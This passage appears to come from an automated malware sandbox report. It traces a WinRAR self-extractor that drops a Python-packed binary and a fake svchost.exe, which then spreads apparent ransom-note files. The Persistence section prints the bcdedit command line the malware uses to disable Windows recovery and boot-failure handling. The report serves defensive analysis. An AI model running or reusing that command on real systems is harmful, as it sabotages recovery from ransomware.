                  Source: C:\Windows\System32\notepad.exeSection loaded: textinputframework.dll
                  Source: C:\Windows\System32\notepad.exeSection loaded: coreuicomponents.dll
                  Source: C:\Windows\System32\notepad.exeSection loaded: coremessaging.dll
                  Source: C:\Windows\System32\notepad.exeSection loaded: ntmarta.dll
                  Source: C:\Windows\System32\notepad.exeSection loaded: urlmon.dll
                  Source: C:\Windows\System32\notepad.exeSection loaded: iertutil.dll
                  Source: C:\Windows\System32\notepad.exeSection loaded: srvcli.dll
                  Source: C:\Windows\System32\notepad.exeSection loaded: netutils.dll
                  Source: C:\Windows\System32\notepad.exeSection loaded: propsys.dll
                  Source: C:\Windows\System32\notepad.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\notepad.exeSection loaded: msvcp110_win.dll
                  Source: C:\Users\user\Desktop\4wx72yFLka.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32
                  Source: C:\Users\user\AppData\Roaming\svchost.exe File written: C:\Users\Default\AppData\Local\Microsoft\Windows Sidebar\settings.ini
                  Source: Window Recorder Window detected: More than 3 window changes detected
                  Source: 4wx72yFLka.exe Static file information: File size 18377488 > 1048576
                  Source: 4wx72yFLka.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                  Source: 4wx72yFLka.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                  Source: 4wx72yFLka.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                  Source: 4wx72yFLka.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: 4wx72yFLka.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                  Source: 4wx72yFLka.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                  Source: 4wx72yFLka.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                  Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: 4wx72yFLka.exe, 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmp, 4wx72yFLka.exe, 00000000.00000000.1441129724.0000000000074000.00000002.00000001.01000000.00000003.sdmp
                  Source: Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: Mai.exe, 00000004.00000002.2728305231.00007FFBA4840000.00000002.00000001.01000000.00000021.sdmp
                  Source: Binary string: ucrtbase.pdb source: Mai.exe, 00000004.00000002.2739998165.00007FFBAA383000.00000002.00000001.01000000.0000000C.sdmp
                  Source: Binary string: D:\a\1\b\bin\amd64\_overlapped.pdb source: Mai.exe, 00000004.00000002.2742453424.00007FFBBB3F6000.00000002.00000001.01000000.0000001C.sdmp
                  Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: Mai.exe, 00000002.00000003.1470693869.00000228ED7B8000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: Mai.exe, 00000002.00000003.1470693869.00000228ED7B8000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: D:\a\1\b\bin\amd64\sqlite3.pdb source: Mai.exe, 00000004.00000002.2727655241.00007FFBA46CE000.00000002.00000001.01000000.00000023.sdmp
                  Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdb source: Mai.exe, 00000002.00000003.1470832541.00000228ED7B8000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: D:\a\1\b\bin\amd64\select.pdb source: Mai.exe, 00000004.00000002.2744924304.00007FFBBC703000.00000002.00000001.01000000.00000016.sdmp
                  Source: Binary string: D:\a\1\b\bin\amd64\_ctypes.pdb source: Mai.exe, 00000004.00000002.2743543663.00007FFBBB430000.00000002.00000001.01000000.00000010.sdmp
                  Source: Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: Mai.exe, 00000002.00000003.1472720577.00000228ED7B8000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: D:\a\1\b\libssl-3.pdbEE source: Mai.exe, 00000004.00000002.2729839617.00007FFBA48F5000.00000002.00000001.01000000.0000001A.sdmp
                  Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdbNN source: Mai.exe, 00000002.00000003.1473163789.00000228ED7B8000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000002.2740981178.00007FFBB189C000.00000002.00000001.01000000.00000014.sdmp
                  Source: Binary string: D:\a\1\b\bin\amd64\_asyncio.pdb source: Mai.exe, 00000002.00000003.1470937814.00000228ED7B8000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000002.2741399937.00007FFBB4C47000.00000002.00000001.01000000.0000001B.sdmp
                  Source: Binary string: .core.pdb.ico.pas source: 4wx72yFLka.exe, 00000000.00000003.1451758273.0000000006A50000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000003.00000002.1536320956.00000000126FB000.00000004.00000800.00020000.00000000.sdmp, main.exe, 00000003.00000000.1465048212.0000000000132000.00000002.00000001.01000000.0000000A.sdmp
                  Source: Binary string: D:\a\1\b\bin\amd64\pyexpat.pdb source: Mai.exe, 00000004.00000002.2739578308.00007FFBAA2B2000.00000002.00000001.01000000.0000001D.sdmp
                  Source: Binary string: D:\a\1\b\bin\amd64\_queue.pdb source: Mai.exe, 00000004.00000002.2744320710.00007FFBBC343000.00000002.00000001.01000000.00000017.sdmp
                  Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: Mai.exe, 00000002.00000003.1473163789.00000228ED7B8000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000002.2740981178.00007FFBB189C000.00000002.00000001.01000000.00000014.sdmp
                  Source: Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: Mai.exe, 00000002.00000003.1471062686.00000228ED7B8000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000002.2743176321.00007FFBBB40D000.00000002.00000001.01000000.00000013.sdmp
                  Source: Binary string: ucrtbase.pdbUGP source: Mai.exe, 00000004.00000002.2739998165.00007FFBAA383000.00000002.00000001.01000000.0000000C.sdmp
                  Source: Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: Mai.exe, 00000004.00000002.2741731661.00007FFBB6298000.00000002.00000001.01000000.00000015.sdmp
                  Source: Binary string: D:\a\1\b\bin\amd64\_sqlite3.pdb source: Mai.exe, 00000004.00000002.2727988873.00007FFBA471E000.00000002.00000001.01000000.00000022.sdmp
                  Source: Binary string: D:\a\1\b\bin\amd64\python3.pdb source: Mai.exe, 00000004.00000002.2708525188.000001995DDB0000.00000002.00000001.01000000.0000000F.sdmp
                  Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdbGCTL source: Mai.exe, 00000002.00000003.1470832541.00000228ED7B8000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: D:\a\1\b\libssl-3.pdb source: Mai.exe, 00000004.00000002.2729839617.00007FFBA48F5000.00000002.00000001.01000000.0000001A.sdmp
                  Source: 4wx72yFLka.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                  Source: 4wx72yFLka.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                  Source: 4wx72yFLka.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                  Source: 4wx72yFLka.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                  Source: 4wx72yFLka.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                  Source: VCRUNTIME140.dll.2.drStatic PE information: 0xC94BF788 [Wed Jan 6 22:49:44 2077 UTC]
                  Source: C:\Users\user\Desktop\4wx72yFLka.exeFile created: C:\Users\user\Desktop\__tmp_rar_sfx_access_check_6747609Jump to behavior
                  Source: 4wx72yFLka.exeStatic PE information: section name: .didat
                  Source: Mai.exe.0.drStatic PE information: section name: _RDATA
                  Source: VCRUNTIME140.dll.2.drStatic PE information: section name: _RDATA
                  Source: libcrypto-3.dll.2.drStatic PE information: section name: .00cfg
                  Source: libssl-3.dll.2.drStatic PE information: section name: .00cfg
                  Source: python311.dll.2.drStatic PE information: section name: PyRuntim
                  Source: C:\Users\user\Desktop\4wx72yFLka.exeCode function: 0_2_00060640 push ecx; ret 0_2_00060653
                  Source: C:\Users\user\Desktop\4wx72yFLka.exeCode function: 0_2_0005FD4C push eax; ret 0_2_0005FD6A
                  Source: C:\Users\user\Desktop\Mai.exeCode function: 2_2_00007FF6DD695004 push rsp; retf 2_2_00007FF6DD695005
                  Source: C:\Users\user\Desktop\main.exeCode function: 3_2_00007FFB4B3800BD pushad ; iretd 3_2_00007FFB4B3800C1
                  Source: C:\Users\user\Desktop\Mai.exeCode function: 4_2_00007FFBA45E0381 push rcx; ret 4_2_00007FFBA45E0385
                  Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 5_2_00007FFB4B3A00BD pushad ; iretd 5_2_00007FFB4B3A00C1
                  Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 26_2_00007FFB4B3800BD pushad ; iretd 26_2_00007FFB4B3800C1
                  Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 37_2_00007FFB4B3700BD pushad ; iretd 37_2_00007FFB4B3700C1

                  Persistence and Installation Behavior

                  Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Roaming\svchost.exeJump to dropped file
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit /set {default} bootstatuspolicy ignoreallfailures
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\bcdedit.exe bcdedit /set {default} recoveryenabled no
                  Source: C:\Users\user\Desktop\Mai.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76562\api-ms-win-core-namedpipe-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76562\api-ms-win-core-localization-l1-2-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76562\api-ms-win-core-file-l2-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\Hash\_BLAKE2b.pydJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76562\api-ms-win-crt-locale-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76562\python311.dllJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76562\_hashlib.pydJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76562\api-ms-win-core-processenvironment-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\Hash\_SHA256.pydJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\Cipher\_Salsa20.pydJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76562\api-ms-win-core-processthreads-l1-1-1.dllJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\Hash\_MD4.pydJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76562\sqlite3.dllJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76562\api-ms-win-core-string-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\Cipher\_raw_aesni.pydJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76562\api-ms-win-core-memory-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76562\_asyncio.pydJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\Cipher\_chacha20.pydJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76562\_bz2.pydJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\Cipher\_raw_eksblowfish.pydJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76562\api-ms-win-crt-heap-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76562\api-ms-win-crt-convert-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76562\pywin32_system32\pywintypes311.dllJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76562\_sqlite3.pydJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\Hash\_poly1305.pydJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\Math\_modexp.pydJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76562\_lzma.pydJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\PublicKey\_x25519.pydJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\PublicKey\_ed25519.pydJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76562\_socket.pydJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76562\api-ms-win-core-file-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76562\api-ms-win-core-rtlsupport-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76562\libcrypto-3.dllJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76562\api-ms-win-crt-math-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76562\python3.dllJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76562\_overlapped.pydJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76562\api-ms-win-core-datetime-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76562\api-ms-win-core-handle-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\PublicKey\_ec_ws.pydJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\Cipher\_pkcs1_decode.pydJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76562\_ssl.pydJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76562\_queue.pydJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76562\api-ms-win-core-file-l1-2-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76562\api-ms-win-core-debug-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\Cipher\_raw_ofb.pydJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\Cipher\_raw_ocb.pydJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76562\api-ms-win-core-console-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\Cipher\_raw_aes.pydJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\Cipher\_ARC4.pydJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76562\api-ms-win-crt-runtime-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76562\api-ms-win-crt-conio-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76562\VCRUNTIME140.dllJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\Hash\_ghash_clmul.pydJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\Hash\_RIPEMD160.pydJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76562\api-ms-win-crt-process-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76562\api-ms-win-core-profile-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76562\_cffi_backend.cp311-win_amd64.pydJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\Cipher\_raw_blowfish.pydJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\Cipher\_raw_ctr.pydJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\Cipher\_raw_cfb.pydJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76562\api-ms-win-core-libraryloader-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76562\_multiprocessing.pydJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\Cipher\_raw_des3.pydJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76562\libffi-8.dllJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\Hash\_keccak.pydJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76562\pyexpat.pydJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76562\api-ms-win-core-sysinfo-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76562\api-ms-win-core-interlocked-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\Hash\_MD5.pydJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76562\api-ms-win-core-heap-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\PublicKey\_ed448.pydJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\Util\_strxor.pydJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76562\charset_normalizer\md__mypyc.cp311-win_amd64.pydJump to dropped file
                  Source: C:\Users\user\Desktop\4wx72yFLka.exeFile created: C:\Users\user\Desktop\Mai.exeJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76562\api-ms-win-crt-string-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76562\api-ms-win-core-processthreads-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76562\api-ms-win-crt-stdio-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76562\api-ms-win-core-timezone-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\Hash\_MD2.pydJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76562\select.pydJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\Hash\_ghash_portable.pydJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76562\api-ms-win-crt-utility-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\Util\_cpuid_c.pydJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76562\unicodedata.pydJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76562\api-ms-win-core-synch-l1-2-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76562\api-ms-win-core-util-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76562\api-ms-win-crt-environment-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\Protocol\_scrypt.pydJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\Hash\_SHA384.pydJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76562\charset_normalizer\md.cp311-win_amd64.pydJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\Cipher\_raw_cast.pydJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76562\api-ms-win-core-errorhandling-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76562\libssl-3.dllJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\Cipher\_raw_arc2.pydJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76562\cryptography\hazmat\bindings\_rust.pydJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76562\ucrtbase.dllJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76562\win32\win32api.pydJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\Hash\_SHA512.pydJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\Hash\_SHA224.pydJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\Hash\_BLAKE2s.pydJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\Cipher\_raw_cbc.pydJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\Hash\_SHA1.pydJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76562\api-ms-win-crt-filesystem-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76562\_ctypes.pydJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76562\api-ms-win-core-synch-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76562\VCRUNTIME140_1.dllJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76562\_decimal.pydJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\Cipher\_raw_ecb.pydJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76562\api-ms-win-crt-time-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\Cipher\_raw_des.pydJump to dropped file
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\read_it.txtJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\af\read_it.txtJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\am\read_it.txtJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ar\read_it.txtJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Maintenance\read_it.txtJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\StartUp\read_it.txtJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\System Tools\read_it.txtJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\AutoIt v3\Extras\AutoItX\read_it.txtJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\Programs\Windows PowerShell\read_it.txtJump to behavior
